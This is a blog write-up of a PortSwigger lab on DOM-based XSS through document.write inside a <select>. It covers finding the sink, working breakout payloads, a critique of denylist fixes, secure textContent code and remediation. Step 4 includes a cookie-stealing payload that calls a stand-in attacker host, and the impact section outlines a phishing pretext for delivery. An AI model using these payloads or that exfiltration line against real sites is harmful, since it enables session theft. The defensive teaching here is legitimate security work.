Web Security Academy: DOM XSS in document.write Inside a <select>

· falasi.net


Table of Contents

Prerequisites #

This lab does not require an intercepting proxy. Everything in this write-up can be reproduced with a browser and its built-in developer tools the Sources panel for locating the sink, the address bar for delivering the payload, and the Console or rendered page for confirming execution.

Summary #

This PortSwigger lab presents a classic DOM-based XSS vulnerability: a value taken directly from the query string is concatenated into a call to document.write, with no encoding or sanitisation in between. The only complication is that the injection point sits inside a <select> element, which is one of the more restrictive parsing contexts in HTML. Most tags placed directly inside a <select> are silently discarded by the parser, so a successful payload has to break out of that context before introducing executable content.

This write-up walks through identifying the sink, confirming the injection context, building a working payload, and more importantly examining what the underlying defect is and how it should actually be fixed.

Step 1: Locating the sink #

Opening DevTools and searching the Sources panel for document.write returns a single hit on the product page:

 1<form id="stockCheckForm" action="/product/stock" method="POST">
 2    <input required type="hidden" name="productId" value="1">
 3    <script>
 4        var stores = ["London","Paris","Milan"];
 5        var store = (new URLSearchParams(window.location.search)).get('storeId');
 6        document.write('<select name="storeId">');
 7        if(store) {
 8            document.write('<option selected>'+store+'</option>');
 9        }
10        for(var i=0;i<stores.length;i++) {
11            if(stores[i] === store) {
12                continue;
13            }
14            document.write('<option>'+stores[i]+'</option>');
15        }
16        document.write('</select>');
17    </script>
18    <button type="submit" class="button">Check stock</button>
19</form>

The store variable is read from the query string via URLSearchParams and is therefore fully attacker-controlled. It is then concatenated into the string '<option selected>'+store+'</option>' and passed to document.write, which parses its argument as HTML and inserts it into the live document. Any character supplied in the storeId parameter is treated as markup at the point of insertion.

The injection lands inside an <option> element, which itself sits inside a <select>. That nesting is significant when it comes to choosing a payload.

Step 2: Confirming the context #

A useful first step in any injection scenario is to send a benign value and observe how it appears in the rendered DOM. Submitting:

?productId=1&storeId=asdf

produces:

1<select name="storeId">
2    <option selected>asdf</option>
3    <option>London</option>
4    <option>Paris</option>
5    <option>Milan</option>
6</select>

The value asdf appears verbatim as the text content of the first <option>, with no encoding applied. That confirms the sink is reachable and that the input is being treated as raw markup rather than text.

The complication, as mentioned, is that <select> is a hostile parsing context. The HTML parser permits only a small set of element types as direct children of a <select> chiefly <option> and <optgroup> and silently discards most others. A naive payload such as <script>alert(1)</script> placed inside an <option> will not execute, because the parser refuses to instantiate the <script> element in that context. To achieve script execution, the payload must first close the surrounding <select> and only then introduce content that the parser will treat as executable.

Step 3: Breaking out of the <select> #

There are two payload shapes that work cleanly here.

The first closes the open attribute and the surrounding <select>, then introduces an <img> element with an onerror handler:

"></select><img src=1 onerror=alert(1)>

URL-encoded for transport in the query string:

?productId=1&storeId=%22%3E%3C%2Fselect%3E%3Cimg%20src%3D1%20onerror%3Dalert(1)%3E

The "> sequence closes the selected attribute and the opening <option> tag, </select> exits the restrictive parsing context, and the <img> element is then parsed normally. Because src=1 does not resolve to a valid image, the browser fires the onerror handler and alert(1) executes.

The second payload the one I used to solve the lab is more elaborate, and worth examining because it directly demonstrates that, once the <select> is closed, normal parsing rules apply and a <script> element will execute as expected:

1<script>eval(myUndefVar);var inject="INJECTION_STARTS_HERE";var myUndefVar;alert(1);//";</script>

URL-encoded:

?productId=1&storeId=%3Cscript%3Eeval(myUndefVar);var%20inject=%22INJECTION_STARTS_HERE%22;var%20myUndefVar;alert(1);//%22;%3C/script%3E

The eval(myUndefVar) call and the surrounding variable declarations are largely decorative: eval throws on the undefined reference, hoisting handles the var declaration, and alert(1) runs regardless. A bare <script>alert(1)</script> works equally well in this position. The more elaborate version is useful as a teaching example, because it shows unambiguously that the injection has re-entered an ordinary JavaScript execution context something that would have been impossible inside the original <select>.

Either payload triggers the alert dialog on page load, which is sufficient to solve the lab.

Step 4: Confirming execution #

When the page loads with the payload in place, the alert(1) dialog appears as expected. A useful secondary observation is that the page also stops rendering at the injection point. This happens because the injected markup interrupts the in-progress document.write stream, and the original closing </select> from the legitimate script is never emitted. The visible breakage is, in itself, useful confirmation: the payload has not merely been deposited in the DOM, it has actively altered how the rest of the page is parsed.

A note on payload choice in less forgiving environments: alert( is one of the most heavily fingerprinted tokens in WAF rule sets. For self-confirmation in a real engagement, console.log(1) is far less conspicuous, and a request such as fetch('//attacker.tld/?c='+document.cookie) provides a more meaningful proof of impact.

Why it works #

The <select> context is incidental. The underlying defect is a single architectural mistake: an attacker-controlled source window.location.search flows directly into a markup-interpreting sink document.write with no encoding applied along the way.

document.write is one of the more dangerous sinks available in client-side JavaScript precisely because it parses its argument as HTML and splices the result into the live document. Any data that flows into it must be HTML-encoded with at least the same care one would apply to a server-side template. The lab code does no encoding whatsoever: no encodeURIComponent, no manual replacement of <, > or quote characters, no detour through a safer DOM API such as textContent. The query string is concatenated raw into the markup and handed to the parser.

Within that context, the <select> element is best understood as an inconvenience for the attacker rather than a defence. It restricts the shape of the payload but does not prevent injection. Once the parsing rules at the injection point are understood, breaking out is routine HTML.

Code review perspective #

The pattern to recognise here is straightforward: a controllable source, a markup sink, and nothing meaningful between them. The lab code is a textbook example.

The vulnerable pattern #

1<script>
2    var store = (new URLSearchParams(window.location.search)).get('storeId');
3    document.write('<option selected>'+store+'</option>');
4</script>

Query-string input flows into document.write via simple string concatenation. There is no defence at any layer.

A common but ineffective fix #

A reviewer encountering this code might be tempted to add a denylist for the most obvious payload:

1<script>
2    var store = (new URLSearchParams(window.location.search)).get('storeId');
3    if (store && store.toLowerCase().indexOf('<script') === -1) {
4        document.write('<option selected>'+store+'</option>');
5    }
6</script>

This appears to address the issue, but it does not. Every event-handler-based payload still works:

"></select><img src=1 onerror=alert(1)>
"></select><svg onload=alert(1)>
"></select><iframe src=javascript:alert(1)>

Denylist approaches to XSS tend to fail at the first attribute-based payload, because the underlying problem has not changed: the data is still being parsed as HTML, and HTML offers a wide range of script-execution vectors that do not involve the literal token <script.

A better fix: encode at the sink #

Encoding the value before insertion does genuinely close the bug:

 1<script>
 2    function htmlEncode(s) {
 3        return s.replace(/&/g, '&amp;')
 4                .replace(/</g, '&lt;')
 5                .replace(/>/g, '&gt;')
 6                .replace(/"/g, '&quot;')
 7                .replace(/'/g, '&#39;');
 8    }
 9
10    var store = (new URLSearchParams(window.location.search)).get('storeId');
11    document.write('<option selected>'+htmlEncode(store)+'</option>');
12</script>

After encoding, < becomes &lt;, the parser treats the value as text rather than markup, and the injection is closed off. The drawback is operational: every developer who subsequently touches this code must remember to call htmlEncode, with the correct encoding for the context, every time. A single forgotten call reintroduces the vulnerability. Encoding at the sink works, but it relies on consistent discipline indefinitely.

The preferred fix: avoid the markup sink entirely #

The most robust fix is to remove the markup sink from the design altogether and build the DOM through the standard APIs:

 1<select name="storeId" id="storeSelect"></select>
 2<script>
 3    var stores = ["London", "Paris", "Milan"];
 4    var store = (new URLSearchParams(window.location.search)).get('storeId');
 5    var select = document.getElementById('storeSelect');
 6
 7    if (store) {
 8        var selected = document.createElement('option');
 9        selected.textContent = store;
10        selected.selected = true;
11        select.appendChild(selected);
12    }
13
14    stores.forEach(function (name) {
15        if (name === store) return;
16        var opt = document.createElement('option');
17        opt.textContent = name;
18        select.appendChild(opt);
19    });
20</script>

textContent assigns its value as text, and cannot introduce tags or attributes regardless of the input. The <select> element exists as static markup, the options are constructed through the DOM API, and there is no markup sink for an attacker to reach. The vulnerability is not being filtered out it has been designed out of the code.

For situations that genuinely require dynamic HTML, a templating library with contextual auto-escaping enabled by default is the appropriate tool. Hand-rolled string concatenation into document.write, innerHTML, or outerHTML should be regarded as a code smell on sight.

Impact #

DOM-based XSS in an authenticated application allows an attacker to execute arbitrary JavaScript in the victim's browser, within the security context of the application's origin. On a production e-commerce site with this defect, the practical consequences include:

Delivery requires only a crafted URL, and the surrounding feature makes social engineering particularly straightforward: this is a stock-checker on a product page, so a message along the lines of "Could you check whether this is in stock at your local store?" with a link attached is plausible in a way that a generic phishing URL is not. Both payload shapes shown above execute on page load, with no further interaction beyond the initial click on the link.

Remediation #

The root cause is unchanged across all of the preceding analysis: a controllable source flows into a markup sink with no encoding. The available fixes, in order of preference, are:

  1. Eliminate the markup sink. Replace calls to document.write, innerHTML, and outerHTML with DOM construction via createElement, and assign user-supplied values through textContent or specific attribute setters. This removes the entire class of vulnerability rather than mitigating individual instances.
  2. Use a templating library with contextual auto-escaping. Most modern frameworks provide this by default, and the dangerous opt-outs (such as React's dangerouslySetInnerHTML) are easy to identify in code review.
  3. If a markup sink cannot be avoided, encode at the point of insertion using the appropriate encoding for the context. Wrong-context encoding is itself a defect, so this approach should be treated as a last resort.
  4. Add a strict Content Security Policy as defence in depth. A CSP that disallows inline scripts and untrusted sources will not prevent the injection from reaching the DOM, but it can neutralise most practical payload shapes. CSP is mitigation, not a fix; the underlying defect still needs to be addressed.

Takeaway #

DOM-based XSS is found primarily by reading code rather than by spraying payloads. The methodology is straightforward: enumerate sinks, trace each one back to its sources, render a benign value to confirm the injection context, and only then construct a payload that fits the parser's rules at that specific point.

This lab is a useful illustration of why the last step matters. A <script> element placed directly inside a <select> will be silently discarded; the same <script> element, introduced after closing the <select>, executes without difficulty. The bug is the same in either case. Recognising the difference between a payload that should work in principle and one that will work in practice is, more often than not, where the actual work happens.

Appendix #

PortSwigger Cross-site scripting (XSS) cheat sheet

last updated: